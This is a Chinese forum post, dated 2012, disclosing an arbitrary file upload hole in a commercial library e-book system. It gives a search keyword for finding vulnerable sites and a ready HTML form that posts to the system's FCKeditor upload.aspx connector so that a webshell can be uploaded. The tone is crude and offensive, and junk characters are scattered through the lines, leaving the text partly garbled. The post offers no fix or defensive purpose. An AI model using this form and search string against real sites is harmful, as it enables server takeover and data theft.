主题:图书馆系统任意文件上传漏洞
n% y' u! G( v( }, _ 作者:冰锋刺客
7 Q6 T5 `4 u& Z( q8 u 厂商:点击书(dianjishu.com)
. E/ X7 a, A0 D& P5 m0 Z. V0 D 日期:2012-6-21) @, v2 D7 R# Y. P' q( a
! S/ i* n# z& r0 MI 概述 b- @% J. _' J8 q
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
! c) u& v* ]: `" l% c+ j II 简介+ d) x6 K; C/ w5 P; e
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
* L5 Z% U6 H s" h, d! y, S 补充一个漏洞. b4 P3 V/ y: N% D+ X
<form id="frmUpload" enctype="multipart/form-data"* C1 v0 s5 ~& h- R& B( D9 n8 x
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
* j Z9 t, J- H9 }. \- E4 P& r ?' x <input id="btnUpload" type="submit" value="操翻他">
8 S4 u" {% Z, X6 r) E6 q </form>
( y; o: `( \) T 你们懂的, a0 u: X" z. l2 F8 J( q4 c
那傻逼提供还需要改包.
$ y/ m2 x' V+ n# B 自己看了下源代码发现fckeditor" _2 P5 m- J6 A0 C* u( S6 d( U6 x
直接秒杀7 P c6 j2 f, v
|
发表于 2012-9-10 21:20:59
收藏
支持
反对